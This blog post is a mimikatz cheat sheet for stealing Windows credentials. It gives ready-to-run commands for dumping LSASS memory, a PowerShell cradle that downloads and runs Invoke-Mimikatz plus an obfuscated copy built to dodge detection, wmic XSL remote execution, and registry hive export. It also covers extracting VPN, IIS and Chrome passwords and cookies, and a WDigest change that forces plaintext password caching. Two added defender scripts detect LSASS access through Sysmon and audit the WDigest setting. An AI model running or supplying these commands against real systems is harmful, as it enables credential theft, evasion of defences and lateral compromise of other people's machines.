壹月 posted on 2019-10-2 16:44:00

mimikatz usage notes

<p>1. Dumping passwords</p>
<p>privilege::debug requests SeDebugPrivilege, which is what lets mimikatz open lsass.exe; it only succeeds from a local administrator (or SYSTEM) context. sekurlsa::logonpasswords then reads the credentials of every logged-on session out of LSASS memory.</p>
<div id="code0">
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">privilege::debug
sekurlsa::logonpasswords
mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" &gt;&gt;1.txt exit
</pre>
</div>
<p>I usually use a .bat file:</p>
<pre class="brush:php;gutter:true;">@echo off
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit &gt; C:\programdata\1.txt</pre>
</div>
<p>2. Dumping passwords with PowerShell</p>
<p>Invoke-Mimikatz from PowerSploit reflectively loads mimikatz into the PowerShell process, so no mimikatz.exe touches disk; -DumpCreds runs sekurlsa::logonpasswords.</p>
<div id="code1">
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
</pre>
</div>
</div>
<p>3. Obfuscation</p>
<p>The same download cradle as above, split into string fragments so that the literal tokens IEX, DownloadString and Invoke-Mimikatz never appear intact on the command line. 1vc is a placeholder that REplaCE swaps for a single quote ([CHAR]39) at run time; only then is the reassembled string piped to IEX.</p>
<div id="code2">
<pre><code class="hljs markdown">powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttps://raw.gith'+'ubus'+'erco'+'ntent.com/matt'+'ife'+'stati'+'on/Power'+'Sploit/ma'+'ster/Exfil'+'tration/Invok'+'e-Mi'+'mikatz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"</code></pre>
</div>
<p>4. Dumping passwords with wmic</p>
<p>wmic's /format switch downloads the XSL stylesheet it is given and executes any script element inside it, so the stylesheet at the URL below, not wmic itself, is what launches the mimikatz payload. Review the stylesheet before relying on it.</p>
<div id="code3">
<pre><code class="hljs nginx">wmic os get /format:"https://gist.githubusercontent.com/manasmbellani/7f3e39170f5bc8e3a493c62b80e69427/raw/87550d0fc03023bab99ad83ced657b9ef272a3b2/mimikatz.xsl"</code></pre>
</div>
<p>5. Offline dumping with procdump</p>
<p>procdump (Sysinternals, Microsoft-signed) writes a full memory dump of lsass.exe, and the dump is parsed with mimikatz somewhere else. Parse it on a machine with the same architecture and Windows major version as the source, otherwise sekurlsa::minidump cannot locate the LSASS structures.</p>
<div id="code4">
<pre><code class="hljs css">procdump64.exe -accepteula -ma lsass.exe 1.dmp
mimikatz.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit</code></pre>
</div>
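<p>Both sections 1 and 5 have to open lsass.exe with memory-read access, which is exactly what Sysmon Event ID 10 (ProcessAccess) records. The script below is an added example for the defender's side and is not part of the original notes: it parses Sysmon's rendered "Key: Value" event message, flags any non-allowlisted image that obtains PROCESS_VM_READ on lsass.exe, and distinguishes the full-access pattern of a dump tool from the read-only pattern of in-memory harvesting. The three event messages and the allowlist entry are constructed samples, not real telemetry.</p>

```powershell
# Added example, not from the original notes. Detect LSASS memory reads from
# Sysmon Event ID 10 messages. Samples below are constructed, not real logs.
# Live use: feed in
#   (Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=10}).Message

# ReadProcessMemory needs PROCESS_VM_READ (0x10). mimikatz typically asks for
# 0x1010 or 0x1410, procdump -ma for 0x1FFFFF; all of them contain this bit.
$PROCESS_VM_READ = 0x0010

# Images that legitimately read LSASS on this estate (assumption; tune per environment).
$AllowedSources = @('C:\Program Files\Windows Defender\MsMpEng.exe')

function ConvertFrom-SysmonMessage {
    # Turn the multi-line "Key: Value" message body into a hashtable.
    param([string]$Message)
    $fields = @{}
    foreach ($line in $Message -split "`r?`n") {
        if ($line -match '^\s*(\w+):\s*(.*)$') { $fields[$Matches[1]] = $Matches[2].Trim() }
    }
    return $fields
}

function Test-LsassAccess {
    # Returns a finding for an LSASS read by a non-allowlisted image, else $null.
    param([hashtable]$Fields)
    if ($Fields['TargetImage'] -notlike '*\lsass.exe') { return $null }
    $mask = [Convert]::ToInt32($Fields['GrantedAccess'], 16)   # accepts the 0x prefix
    if (($mask -band $PROCESS_VM_READ) -eq 0) { return $null }
    if ($AllowedSources -contains $Fields['SourceImage']) { return $null }
    $note = if ($mask -eq 0x1FFFFF) { 'full access: dump tool (procdump/Task Manager style)' }
            else { 'read access: in-memory credential harvesting (mimikatz style)' }
    [pscustomobject]@{
        UtcTime       = $Fields['UtcTime']
        SourceImage   = $Fields['SourceImage']
        SourcePid     = $Fields['SourceProcessId']
        GrantedAccess = $Fields['GrantedAccess']
        Note          = $note
    }
}

# Constructed sample events in Sysmon's rendered message format.
$m1 = @'
Process accessed:
RuleName: -
UtcTime: 2019-10-02 08:44:00.000
SourceProcessId: 4212
SourceImage: C:\Users\bob\Desktop\mimikatz.exe
TargetProcessId: 652
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Windows\System32\KERNELBASE.dll+2fbe8|UNKNOWN(0000000000401A3B)
'@
$m2 = @'
Process accessed:
RuleName: -
UtcTime: 2019-10-02 08:45:10.000
SourceProcessId: 5120
SourceImage: C:\tools\procdump64.exe
TargetProcessId: 652
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Windows\System32\KERNELBASE.dll+2fbe8|C:\tools\procdump64.exe+1f2a4
'@
$m3 = @'
Process accessed:
RuleName: -
UtcTime: 2019-10-02 08:46:00.000
SourceProcessId: 3004
SourceImage: C:\Program Files\Windows Defender\MsMpEng.exe
TargetProcessId: 652
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1400
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Windows\System32\KERNELBASE.dll+2fbe8
'@

# Expected: m1 and m2 are reported; m3 has no VM_READ bit and is allowlisted anyway.
@($m1, $m2, $m3) |
    ForEach-Object { Test-LsassAccess (ConvertFrom-SysmonMessage $_) } |
    Where-Object { $_ } |
    Format-Table -AutoSize
```

<p>Matching on the access-mask bit rather than on the literal values 0x1010 and 0x1410 also catches variants that add unrelated rights to the request; the allowlist is what keeps AV and EDR agents, which read LSASS for legitimate reasons, out of the results.</p>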
<p>6. Exporting hashes offline from the registry hives</p>
<p>reg save copies the hives to disk; it needs SeBackupPrivilege, i.e. an elevated prompt. SYSTEM holds the boot key that decrypts the local account NT hashes in SAM. SECURITY, which is saved below but not used by the mimikatz command that follows, holds the LSA secrets and cached domain logons, which lsadump::secrets and lsadump::cache read offline with the same /system: hive.</p>
<div id="code5">
<pre><code class="hljs nginx">reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security.hiv
mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit</code></pre>
</div>
<p>7. Dumping VPN passwords</p>
<p>token::elevate impersonates SYSTEM so that lsadump::sam and lsadump::secrets can read the live SAM and LSA secrets without a saved hive; saved RAS/VPN credentials are stored among the LSA secrets.</p>
<div id="code6">
<pre><code class="hljs php">mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit</code></pre>
</div>
<p>8. Reading passwords from the IIS 7 configuration</p>
<p>applicationHost.config stores application-pool identity and virtual-directory credentials encrypted with the IIS configuration keys of the machine; /live decrypts them on the host that owns those keys.</p>
<div id="code7">
<pre><code class="hljs perl">mimikatz.exe privilege::debug log "iis::apphost /in:%systemroot%\system32\inetsrv\config\applicationHost.config /live" exit</code></pre>
</div>
<p>9. Dumping browser passwords and cookies</p>
<p>Chrome protects cookies and saved logins with DPAPI under the user's master key. /unprotect decrypts through CryptUnprotectData, so these commands must run in that user's session to return plaintext; USERDA~1 and LOGIND~1 are the 8.3 short names of "User Data" and "Login Data", used so the paths need no quoting inside the argument.</p>
<div id="code8">
<pre><code class="hljs perl">rem Chrome cookies
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\Default\cookies /unprotect" exit
rem Chrome saved passwords
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\Default\LOGIND~1 /unprotect" exit</code></pre>
</div>
<p>10. Dumping passwords on Windows Server 2012</p>
<p>On Windows 8.1 / Server 2012 R2, and on older systems with KB2871997 installed, WDigest no longer keeps plaintext passwords in LSASS, so sekurlsa::logonpasswords shows only hashes. Setting UseLogonCredential to 1 turns the caching back on, but only for logons that happen after the change, which is why the session is locked: the user has to type the password again to unlock it.</p>
<div id="code9">
<pre><code class="hljs cs">rem Re-enable WDigest plaintext credential caching
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
rem Lock the session so the user must re-enter the password (only logons after the change are cached)
rundll32.exe user32.dll,LockWorkStation</code></pre>
</div>
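<p>The other side of section 10: an added example, not from the original notes, that audits the WDigest setting the technique depends on and, with a -Remediate switch introduced here (not a mimikatz option), writes back the hardened value. It assumes an elevated shell.</p>

```powershell
# Added example, not from the original notes. Check whether WDigest plaintext
# caching has been switched on and optionally set it back to 0.
# Assumptions: elevated shell; -Remediate is a switch defined by this script.
param([switch]$Remediate)

$Key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$Name = 'UseLogonCredential'

function Get-WDigestState {
    # Value meanings:
    #   1      plaintext caching forced on (the weak setting section 10 sets)
    #   0      plaintext caching off (the hardened setting)
    #   absent default: off on 8.1/2012 R2 and later; on 7/2008 R2/2012 only
    #          off once KB2871997 is installed
    $val = (Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue).$Name
    [pscustomobject]@{
        Path    = $Key
        Value   = $val
        Exposed = ($val -eq 1)
    }
}

$state = Get-WDigestState
$state | Format-List

if ($state.Exposed) {
    Write-Warning "WDigest plaintext caching is enabled: sekurlsa::logonpasswords will show cleartext for every logon after it was set."
    if ($Remediate) {
        # Hardened setting. Credentials already cached in LSASS remain until
        # those sessions end; a reboot clears them.
        Set-ItemProperty -Path $Key -Name $Name -Type DWord -Value 0
        Write-Output "UseLogonCredential set to 0."
    }
} else {
    Write-Output "UseLogonCredential is not 1: WDigest plaintext caching is off or at its patched default."
}
```

<p>The reg add in section 10 is itself a good detection point: Sysmon Event ID 13 (RegistryEvent, value set) on this key path, or a Windows object-access audit on it, fires the moment the value is changed, well before the lock-screen step yields a password.</p>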
Source: https://www.cnblogs.com/abubu/p/11617734.html